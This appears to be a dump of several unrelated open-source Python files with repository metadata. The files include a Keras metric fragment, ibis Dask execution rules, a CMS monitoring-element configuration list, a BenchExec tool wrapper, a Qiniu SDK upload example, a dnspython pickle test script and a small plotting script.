"total",
initializer=tf.keras.initializers.zeros,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA,
)
self.count = self.add_weight(
"count",
initializer=tf.keras.initializers.zeros,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA,
)
self._size = tf.cast(np.prod(input_shape), self.dtype)
self.built = True
def update_state(self, values, sample_weight=None):
values = tf.cast(values, self.values_dtype)
if not self.built:
with tf.name_scope(self.name), tf.init_scope():
self.build(values.shape)
unchanged_values = tf.math.count_nonzero(
tf.equal(self._previous_values, values)
)
flip_ratio = 1 - (
tf.cast(unchanged_values, self.dtype) / tf.cast(self._size, self.dtype)
)
update_total_op = self.total.assign_add(flip_ratio * tf.sign(self.count))
with tf.control_dependencies([update_total_op]):
update_count_op = self.count.assign_add(1)
with tf.control_dependencies([update_count_op]):
return self._previous_values.assign(values)
def result(self):
return tf.compat.v1.div_no_nan(self.total, self.count - 1)
def reset_state(self):
tf.keras.backend.batch_set_value(
[(v, 0) for v in self.variables if v is not self._previous_values]
)
def reset_states(self):
self.reset_state() # For backwards compatibility with < 2.5
def get_config(self):
return {**super().get_config(), "values_dtype": self.values_dtype.name}
|
06b9ffde47819c221680a56b9eb10222072179b1
|
dbe83cf6c2b78a61def862ca19625c2f78268af8
|
/ibis/backends/dask/execution/indexing.py
|
c2a5cca21dd12b3ac1c204d6e677734d9503b3f0
|
[
"Apache-2.0"
] |
permissive
|
ibis-project/ibis
|
56a169d75805db7dfd39192cf0562521c405ff1c
|
3866492906d731dc170b560e7d7471bd4855169a
|
refs/heads/master
| 2023-09-01T17:07:38.854510
| 2023-09-01T13:52:08
| 2023-09-01T15:32:04
| 34,139,230
| 2,304
| 384
|
Apache-2.0
| 2023-09-14T21:52:21
| 2015-04-17T20:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
indexing.py
|
"""Execution rules for ops.Where operations."""
from __future__ import annotations
import dask.dataframe as dd
import ibis.expr.operations as ops
from ibis.backends.dask.dispatch import execute_node
from ibis.backends.pandas.core import boolean_types, scalar_types, simple_types
from ibis.backends.pandas.execution.generic import pd_where
@execute_node.register(ops.Where, (dd.Series, *boolean_types), dd.Series, dd.Series)
@execute_node.register(ops.Where, (dd.Series, *boolean_types), dd.Series, simple_types)
@execute_node.register(ops.Where, (dd.Series, *boolean_types), simple_types, dd.Series)
@execute_node.register(ops.Where, (dd.Series, *boolean_types), type(None), type(None))
def execute_node_where(op, cond, true, false, **kwargs):
if any(isinstance(x, (dd.Series, dd.core.Scalar)) for x in (cond, true, false)):
return dd.map_partitions(pd_where, cond, true, false)
# All are immediate scalars, handle locally
return true if cond else false
# For true/false as scalars, we only support identical type pairs + None to
# limit the size of the dispatch table and not have to worry about type
# promotion.
for typ in (str, *scalar_types):
for cond_typ in (dd.Series, *boolean_types):
execute_node.register(ops.Where, cond_typ, typ, typ)(execute_node_where)
execute_node.register(ops.Where, cond_typ, type(None), typ)(execute_node_where)
execute_node.register(ops.Where, cond_typ, typ, type(None))(execute_node_where)
|
13a5c2a3c6983b7260fbbdac7c187454b5f7d1ab
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/DQMServices/Core/python/nanoDQMIO_perLSoutput_cff.py
|
7ec70f64a16b38332985e47b91311e6cc7b0e7f4
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 14,405
|
py
|
nanoDQMIO_perLSoutput_cff.py
|
import FWCore.ParameterSet.Config as cms
# Configuration file for nanoDQMIO
# Use this file to specify which monitoring elements (MEs) will be stored in the nanoDQMIO format.
# For more information, see https://twiki.cern.ch/twiki/bin/view/CMS/PerLsDQMIO.
# Use the full ME path, as displayed for example in the DQM GUI.
# The current selection of MEs is for the reprocessing of 2022 data.
nanoDQMIO_perLSoutput = cms.PSet(
MEsToSave = cms.untracked.vstring(*(
"Hcal/DigiTask/Occupancy/depth/depth1",
"Hcal/DigiTask/Occupancy/depth/depth2",
"Hcal/DigiTask/Occupancy/depth/depth3",
"Hcal/DigiTask/Occupancy/depth/depth4",
"Hcal/DigiTask/Occupancy/depth/depth5",
"Hcal/DigiTask/Occupancy/depth/depth6",
"Hcal/DigiTask/Occupancy/depth/depth7",
"Hcal/DigiTask/Occupancy/depth/depthHO",
"Hcal/DigiTask/OccupancyCut/depth/depth1",
"Hcal/DigiTask/OccupancyCut/depth/depth2",
"Hcal/DigiTask/OccupancyCut/depth/depth3",
"Hcal/DigiTask/OccupancyCut/depth/depth4",
"Hcal/DigiTask/OccupancyCut/depth/depth5",
"Hcal/DigiTask/OccupancyCut/depth/depth6",
"Hcal/DigiTask/OccupancyCut/depth/depth7",
"Hcal/DigiTask/OccupancyCut/depth/depthHO",
"EcalBarrel/EBOccupancyTask/EBOT digi occupancy",
"EcalEndcap/EEOccupancyTask/EEOT digi occupancy EE -",
"EcalEndcap/EEOccupancyTask/EEOT digi occupancy EE +",
"EcalBarrel/EBOccupancyTask/EBOT DCC entries",
"EcalEndcap/EEOccupancyTask/EEOT DCC entries",
"Ecal/EventInfo/processedEvents",
"PixelPhase1/Tracks/charge_PXBarrel",
"PixelPhase1/Tracks/charge_PXForward",
"PixelPhase1/Tracks/PXBarrel/charge_PXLayer_1",
"PixelPhase1/Tracks/PXBarrel/charge_PXLayer_2",
"PixelPhase1/Tracks/PXBarrel/charge_PXLayer_3",
"PixelPhase1/Tracks/PXBarrel/charge_PXLayer_4",
"PixelPhase1/Tracks/PXForward/charge_PXDisk_+1",
"PixelPhase1/Tracks/PXForward/charge_PXDisk_+2",
"PixelPhase1/Tracks/PXForward/charge_PXDisk_+3",
"PixelPhase1/Tracks/PXForward/charge_PXDisk_-1",
"PixelPhase1/Tracks/PXForward/charge_PXDisk_-2",
"PixelPhase1/Tracks/PXForward/charge_PXDisk_-3",
"PixelPhase1/Tracks/PXBarrel/size_PXLayer_1",
"PixelPhase1/Tracks/PXBarrel/size_PXLayer_2",
"PixelPhase1/Tracks/PXBarrel/size_PXLayer_3",
"PixelPhase1/Tracks/PXBarrel/size_PXLayer_4",
"PixelPhase1/Tracks/PXForward/size_PXDisk_+1",
"PixelPhase1/Tracks/PXForward/size_PXDisk_+2",
"PixelPhase1/Tracks/PXForward/size_PXDisk_+3",
"PixelPhase1/Tracks/PXForward/size_PXDisk_-1",
"PixelPhase1/Tracks/PXForward/size_PXDisk_-2",
"PixelPhase1/Tracks/PXForward/size_PXDisk_-3",
"HLT/Vertexing/hltPixelVertices/hltPixelVertices/goodvtxNbr",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_eta",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_hits",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_phi",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_pt",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_unMatched_eta",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_unMatched_hits",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_unMatched_phi",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/mon_unMatched_pt",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_eta",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_hits",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_matched_eta",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_matched_hits",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_matched_phi",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_matched_pt",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_phi",
"HLT/Tracking/ValidationWRTOffline/hltMergedWrtHighPurityPV/ref_pt",
"HLT/Tracking/pixelTracks/GeneralProperties/Chi2Prob_GenTk",
"HLT/Tracking/pixelTracks/GeneralProperties/Chi2oNDFVsEta_ImpactPoint_GenTk",
"HLT/Tracking/pixelTracks/GeneralProperties/DeltaZToPVZoom_GenTk",
"HLT/Tracking/pixelTracks/GeneralProperties/DistanceOfClosestApproachToPVVsPhi_GenTk",
"HLT/Tracking/pixelTracks/GeneralProperties/DistanceOfClosestApproachToPVZoom_GenTk",
"HLT/Tracking/pixelTracks/GeneralProperties/NumberOfTracks_GenTk",
"HLT/Tracking/tracks/GeneralProperties/Chi2Prob_GenTk",
"HLT/Tracking/tracks/GeneralProperties/Chi2oNDFVsEta_ImpactPoint_GenTk",
"HLT/Tracking/tracks/GeneralProperties/DeltaZToPVZoom_GenTk",
"HLT/Tracking/tracks/GeneralProperties/DistanceOfClosestApproachToPVVsPhi_GenTk",
"HLT/Tracking/tracks/GeneralProperties/DistanceOfClosestApproachToPVZoom_GenTk",
"HLT/Tracking/tracks/GeneralProperties/NumberOfTracks_GenTk",
"HLT/Tracking/tracks/LUMIanalysis/NumberEventsVsLUMI",
"HLT/Tracking/tracks/PUmonitoring/NumberEventsVsGoodPVtx",
"PixelPhase1/Tracks/num_clusters_ontrack_PXBarrel",
"PixelPhase1/Tracks/num_clusters_ontrack_PXForward",
"PixelPhase1/Tracks/clusterposition_zphi_ontrack",
"PixelPhase1/Tracks/PXBarrel/clusterposition_zphi_ontrack_PXLayer_1",
"PixelPhase1/Tracks/PXBarrel/clusterposition_zphi_ontrack_PXLayer_2",
"PixelPhase1/Tracks/PXBarrel/clusterposition_zphi_ontrack_PXLayer_3",
"PixelPhase1/Tracks/PXBarrel/clusterposition_zphi_ontrack_PXLayer_4",
"PixelPhase1/Tracks/PXForward/clusterposition_xy_ontrack_PXDisk_+1",
"PixelPhase1/Tracks/PXForward/clusterposition_xy_ontrack_PXDisk_+2",
"PixelPhase1/Tracks/PXForward/clusterposition_xy_ontrack_PXDisk_+3",
"PixelPhase1/Tracks/PXForward/clusterposition_xy_ontrack_PXDisk_-1",
"PixelPhase1/Tracks/PXForward/clusterposition_xy_ontrack_PXDisk_-2",
"PixelPhase1/Tracks/PXForward/clusterposition_xy_ontrack_PXDisk_-3",
"SiStrip/MechanicalView/TEC/PLUS/wheel_1/NormalizedHitResiduals_TEC__wheel__1",
"SiStrip/MechanicalView/TEC/PLUS/wheel_2/NormalizedHitResiduals_TEC__wheel__2",
"SiStrip/MechanicalView/TEC/PLUS/wheel_3/NormalizedHitResiduals_TEC__wheel__3",
"SiStrip/MechanicalView/TEC/PLUS/wheel_4/NormalizedHitResiduals_TEC__wheel__4",
"SiStrip/MechanicalView/TEC/PLUS/wheel_5/NormalizedHitResiduals_TEC__wheel__5",
"SiStrip/MechanicalView/TEC/PLUS/wheel_6/NormalizedHitResiduals_TEC__wheel__6",
"SiStrip/MechanicalView/TEC/PLUS/wheel_7/NormalizedHitResiduals_TEC__wheel__7",
"SiStrip/MechanicalView/TEC/PLUS/wheel_8/NormalizedHitResiduals_TEC__wheel__8",
"SiStrip/MechanicalView/TEC/PLUS/wheel_9/NormalizedHitResiduals_TEC__wheel__9",
"SiStrip/MechanicalView/TEC/MINUS/wheel_1/NormalizedHitResiduals_TEC__wheel__1",
"SiStrip/MechanicalView/TEC/MINUS/wheel_2/NormalizedHitResiduals_TEC__wheel__2",
"SiStrip/MechanicalView/TEC/MINUS/wheel_3/NormalizedHitResiduals_TEC__wheel__3",
"SiStrip/MechanicalView/TEC/MINUS/wheel_4/NormalizedHitResiduals_TEC__wheel__4",
"SiStrip/MechanicalView/TEC/MINUS/wheel_5/NormalizedHitResiduals_TEC__wheel__5",
"SiStrip/MechanicalView/TEC/MINUS/wheel_6/NormalizedHitResiduals_TEC__wheel__6",
"SiStrip/MechanicalView/TEC/MINUS/wheel_7/NormalizedHitResiduals_TEC__wheel__7",
"SiStrip/MechanicalView/TEC/MINUS/wheel_8/NormalizedHitResiduals_TEC__wheel__8",
"SiStrip/MechanicalView/TEC/MINUS/wheel_9/NormalizedHitResiduals_TEC__wheel__9",
"SiStrip/MechanicalView/TEC/PLUS/wheel_1/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__1",
"SiStrip/MechanicalView/TEC/PLUS/wheel_2/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__2",
"SiStrip/MechanicalView/TEC/PLUS/wheel_3/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__3",
"SiStrip/MechanicalView/TEC/PLUS/wheel_4/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__4",
"SiStrip/MechanicalView/TEC/PLUS/wheel_5/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__5",
"SiStrip/MechanicalView/TEC/PLUS/wheel_6/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__6",
"SiStrip/MechanicalView/TEC/PLUS/wheel_7/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__7",
"SiStrip/MechanicalView/TEC/PLUS/wheel_8/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__8",
"SiStrip/MechanicalView/TEC/PLUS/wheel_9/Summary_ClusterStoNCorr__OnTrack__TEC__PLUS__wheel__9",
"SiStrip/MechanicalView/TEC/MINUS/wheel_1/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__1",
"SiStrip/MechanicalView/TEC/MINUS/wheel_2/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__2",
"SiStrip/MechanicalView/TEC/MINUS/wheel_3/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__3",
"SiStrip/MechanicalView/TEC/MINUS/wheel_4/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__4",
"SiStrip/MechanicalView/TEC/MINUS/wheel_5/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__5",
"SiStrip/MechanicalView/TEC/MINUS/wheel_6/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__6",
"SiStrip/MechanicalView/TEC/MINUS/wheel_7/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__7",
"SiStrip/MechanicalView/TEC/MINUS/wheel_8/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__8",
"SiStrip/MechanicalView/TEC/MINUS/wheel_9/Summary_ClusterStoNCorr__OnTrack__TEC__MINUS__wheel__9",
"SiStrip/MechanicalView/TIB/layer_1/NormalizedHitResiduals_TIB__Layer__1",
"SiStrip/MechanicalView/TIB/layer_2/NormalizedHitResiduals_TIB__Layer__2",
"SiStrip/MechanicalView/TIB/layer_3/NormalizedHitResiduals_TIB__Layer__3",
"SiStrip/MechanicalView/TIB/layer_4/NormalizedHitResiduals_TIB__Layer__4",
"SiStrip/MechanicalView/TIB/layer_1/Summary_ClusterStoNCorr__OnTrack__TIB__layer__1",
"SiStrip/MechanicalView/TIB/layer_2/Summary_ClusterStoNCorr__OnTrack__TIB__layer__2",
"SiStrip/MechanicalView/TIB/layer_3/Summary_ClusterStoNCorr__OnTrack__TIB__layer__3",
"SiStrip/MechanicalView/TIB/layer_4/Summary_ClusterStoNCorr__OnTrack__TIB__layer__4",
"SiStrip/MechanicalView/TID/PLUS/wheel_1/NormalizedHitResiduals_TID__wheel__1",
"SiStrip/MechanicalView/TID/PLUS/wheel_2/NormalizedHitResiduals_TID__wheel__2",
"SiStrip/MechanicalView/TID/PLUS/wheel_3/NormalizedHitResiduals_TID__wheel__3",
"SiStrip/MechanicalView/TID/MINUS/wheel_1/NormalizedHitResiduals_TID__wheel__1",
"SiStrip/MechanicalView/TID/MINUS/wheel_2/NormalizedHitResiduals_TID__wheel__2",
"SiStrip/MechanicalView/TID/MINUS/wheel_3/NormalizedHitResiduals_TID__wheel__3",
"SiStrip/MechanicalView/TID/PLUS/wheel_1/Summary_ClusterStoNCorr__OnTrack__TID__PLUS__wheel__1",
"SiStrip/MechanicalView/TID/PLUS/wheel_2/Summary_ClusterStoNCorr__OnTrack__TID__PLUS__wheel__2",
"SiStrip/MechanicalView/TID/PLUS/wheel_3/Summary_ClusterStoNCorr__OnTrack__TID__PLUS__wheel__3",
"SiStrip/MechanicalView/TID/MINUS/wheel_1/Summary_ClusterStoNCorr__OnTrack__TID__MINUS__wheel__1",
"SiStrip/MechanicalView/TID/MINUS/wheel_2/Summary_ClusterStoNCorr__OnTrack__TID__MINUS__wheel__2",
"SiStrip/MechanicalView/TID/MINUS/wheel_3/Summary_ClusterStoNCorr__OnTrack__TID__MINUS__wheel__3",
"SiStrip/MechanicalView/TOB/layer_1/NormalizedHitResiduals_TOB__Layer__1",
"SiStrip/MechanicalView/TOB/layer_2/NormalizedHitResiduals_TOB__Layer__2",
"SiStrip/MechanicalView/TOB/layer_3/NormalizedHitResiduals_TOB__Layer__3",
"SiStrip/MechanicalView/TOB/layer_4/NormalizedHitResiduals_TOB__Layer__4",
"SiStrip/MechanicalView/TOB/layer_5/NormalizedHitResiduals_TOB__Layer__5",
"SiStrip/MechanicalView/TOB/layer_6/NormalizedHitResiduals_TOB__Layer__6",
"SiStrip/MechanicalView/TOB/layer_1/Summary_ClusterStoNCorr__OnTrack__TOB__layer__1",
"SiStrip/MechanicalView/TOB/layer_2/Summary_ClusterStoNCorr__OnTrack__TOB__layer__2",
"SiStrip/MechanicalView/TOB/layer_3/Summary_ClusterStoNCorr__OnTrack__TOB__layer__3",
"SiStrip/MechanicalView/TOB/layer_4/Summary_ClusterStoNCorr__OnTrack__TOB__layer__4",
"SiStrip/MechanicalView/TOB/layer_5/Summary_ClusterStoNCorr__OnTrack__TOB__layer__5",
"SiStrip/MechanicalView/TOB/layer_6/Summary_ClusterStoNCorr__OnTrack__TOB__layer__6",
"SiStrip/MechanicalView/MainDiagonal Position",
"SiStrip/MechanicalView/NumberOfClustersInPixel",
"SiStrip/MechanicalView/NumberOfClustersInStrip",
"Tracking/TrackParameters/generalTracks/LSanalysis/Chi2oNDF_lumiFlag_GenTk",
"Tracking/TrackParameters/generalTracks/LSanalysis/NumberOfRecHitsPerTrack_lumiFlag_GenTk",
"Tracking/TrackParameters/generalTracks/LSanalysis/NumberOfTracks_lumiFlag_GenTk",
"Tracking/TrackParameters/highPurityTracks/pt_1/GeneralProperties/SIPDxyToPV_GenTk",
"Tracking/TrackParameters/highPurityTracks/pt_1/GeneralProperties/SIPDzToPV_GenTk",
"Tracking/TrackParameters/highPurityTracks/pt_1/GeneralProperties/SIP3DToPV_GenTk",
"Tracking/TrackParameters/generalTracks/HitProperties/NumberOfMissingOuterRecHitsPerTrack_GenTk",
"Tracking/TrackParameters/generalTracks/HitProperties/NumberMORecHitsPerTrackVsPt_GenTk",
"OfflinePV/offlinePrimaryVertices/tagVtxProb",
"OfflinePV/offlinePrimaryVertices/tagType",
"OfflinePV/Resolution/PV/pull_x",
"OfflinePV/Resolution/PV/pull_y",
"OfflinePV/Resolution/PV/pull_z",
"JetMET/Jet/Cleanedak4PFJetsCHS/CHFrac_highPt_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/CHFrac_highPt_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/CHFrac_mediumPt_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/CHFrac_mediumPt_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/CHFrac_lowPt_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/CHFrac_lowPt_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/ChMultiplicity_highPt_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/ChMultiplicity_highPt_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/ChMultiplicity_mediumPt_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/ChMultiplicity_mediumPt_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/ChMultiplicity_lowPt_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/ChMultiplicity_lowPt_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/Constituents",
"JetMET/Jet/Cleanedak4PFJetsCHS/Eta",
"JetMET/Jet/Cleanedak4PFJetsCHS/Eta_uncor",
"JetMET/Jet/Cleanedak4PFJetsCHS/JetEnergyCorr",
"JetMET/Jet/Cleanedak4PFJetsCHS/NJets",
"JetMET/Jet/Cleanedak4PFJetsCHS/Phi",
"JetMET/Jet/Cleanedak4PFJetsCHS/Phi_Barrel",
"JetMET/Jet/Cleanedak4PFJetsCHS/Phi_EndCap",
"JetMET/Jet/Cleanedak4PFJetsCHS/Pt",
"JetMET/MET/pfMETT1/Cleaned/METSig",
"JetMET/vertices",
) )
)
|
77d3b0986468fb24622fda27af56f331ba98999a
|
09e4ef23c31fbb248339c39ceec5226a97ca3103
|
/benchexec/tools/ulcseq.py
|
5f3f59a842174152fb9eba7f65ff743baef908fc
|
[
"Apache-2.0"
] |
permissive
|
sosy-lab/benchexec
|
a51676f9e501743444c96a32ec2e91ae4f3ac889
|
2c56e08d5f0f44b3073f9c82a6c5f166a12b45e7
|
refs/heads/main
| 2023-09-01T22:45:59.070016
| 2023-08-23T05:36:58
| 2023-08-24T09:38:40
| 30,758,422
| 176
| 190
|
Apache-2.0
| 2023-06-30T08:39:22
| 2015-02-13T13:55:15
|
Python
|
UTF-8
|
Python
| false
| false
| 591
|
py
|
ulcseq.py
|
# This file is part of BenchExec, a framework for reliable benchmarking:
# https://github.com/sosy-lab/benchexec
#
# SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
#
# SPDX-License-Identifier: Apache-2.0
import benchexec.util as util
from . import cseq
class Tool(cseq.CSeqTool):
"""
Tool info for UL-CSeq (http://users.ecs.soton.ac.uk/gp4/cseq/cseq.html).
"""
REQUIRED_PATHS = ["backends", "bin", "include", "ul-cseq.py"]
def executable(self):
return util.find_executable("ul-cseq.py")
def name(self):
return "UL-CSeq"
|
3b6a31c124cc47af77be44481836cf927981c94c
|
1e924a68d2103f3ddd0c46122e960975eaae9334
|
/examples/upload_with_zone.py
|
c8650d39b9c94f680da3903844bd94d041201f18
|
[
"MIT"
] |
permissive
|
qiniu/python-sdk
|
d42ed5d9eefbda9ab7735ef89adf124840db4364
|
7d6eb2dde37a53b421cda71709422574eadc8874
|
refs/heads/master
| 2023-08-26T14:22:36.349580
| 2023-08-21T07:26:51
| 2023-08-21T07:26:51
| 3,795,717
| 527
| 317
|
MIT
| 2023-08-21T07:26:52
| 2012-03-22T08:25:20
|
Python
|
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
upload_with_zone.py
|
# -*- coding: utf-8 -*-
# flake8: noqa
from qiniu import Auth, put_file
from qiniu import Zone, set_default
# 需要填写你的 Access Key 和 Secret Key
access_key = ''
secret_key = ''
# 构建鉴权对象
q = Auth(access_key, secret_key)
# 要上传的空间
bucket_name = 'bucket_name'
# 上传到七牛后保存的文件名
key = 'a.jpg'
# 生成上传 Token,可以指定过期时间等
token = q.upload_token(bucket_name, key, 3600)
# 要上传文件的本地路径
localfile = '/Users/abc/Documents/a.jpg'
# 指定固定域名的zone,不同区域uphost域名见下文档
# https://developer.qiniu.com/kodo/manual/1671/region-endpoint
# 未指定或上传错误,sdk会根据token自动查询对应的上传域名
# *.qiniup.com 支持https上传
# 备用*.qiniu.com域名 不支持https上传
# 要求https上传时,如果客户指定的两个host都错误,且sdk自动查询的第一个*.qiniup.com上传域名因意外不可用导致访问到备用*.qiniu.com会报ssl错误
# 建议https上传时查看上面文档,指定正确的host
zone = Zone(
up_host='https://up.qiniup.com',
up_host_backup='https://upload.qiniup.com',
io_host='http://iovip.qbox.me',
scheme='https')
set_default(default_zone=zone)
ret, info = put_file(token, key, localfile)
print(info)
|
0f85d2ccd7128e25585b123684a4ec28cea8d622
|
b6ef14f2450db87b8b902ee2b606a3d3b223f0ca
|
/util/generate-mx-pickle.py
|
a917e0892ba41c168571affeb201dde999b307b1
|
[
"ISC",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
rthalley/dnspython
|
88f6b18738b2548e83e6f82e5a296dfa555b77d3
|
c465d3c0e15a52e4109c9f80131e657d8bdb0471
|
refs/heads/master
| 2023-08-30T17:03:04.472884
| 2023-08-29T21:11:10
| 2023-08-29T21:11:17
| 2,261,155
| 2,049
| 554
|
NOASSERTION
| 2023-09-14T16:05:48
| 2011-08-24T11:36:39
|
Python
|
UTF-8
|
Python
| false
| false
| 437
|
py
|
generate-mx-pickle.py
|
import pickle
import sys
import dns.rdata
import dns.version
# Generate a pickled mx RR for the current dnspython version
mx = dns.rdata.from_text("in", "mx", "10 mx.example.")
filename = f"pickled-{dns.version.MAJOR}-{dns.version.MINOR}.pickle"
with open(filename, "wb") as f:
pickle.dump(mx, f)
with open(filename, "rb") as f:
mx2 = pickle.load(f)
if mx == mx2:
print("ok")
else:
print("DIFFERENT!")
sys.exit(1)
|
b56af1c44d0b255b58e678152238cb454b9af46d
|
b4a350c2697dbfdb22215d64034b074c2c1bfe2b
|
/convtrees/plot.py
|
eb99098998bd4afec2d02923085d95c79e978f33
|
[] |
no_license
|
jonnor/embeddedml
|
391dddd0a930cd77aebc3f920e6c3ea67591dedf
|
ea13926dcc2d1468680951dc0c37d6d1594251d2
|
refs/heads/master
| 2023-08-25T15:38:16.800021
| 2023-08-15T23:14:33
| 2023-08-15T23:14:33
| 197,437,798
| 137
| 22
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
plot.py
|
import pandas
from matplotlib import pyplot as plt
df = pandas.read_csv('results.csv')
fig, (est_ax, leaf_ax) = plt.subplots(1, 2, figsize=(8, 6))
df.plot.scatter(ax=est_ax, y='mean_test_score', x='param_n_estimators')
df[df.param_n_estimators == 100].plot.scatter(ax=leaf_ax, y='mean_test_score', x='param_min_samples_leaf')
leaf_ax.set_xscale('log')
leaf_ax.set_xlim(1e-9, 1e-2)
fig.savefig('res.png')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.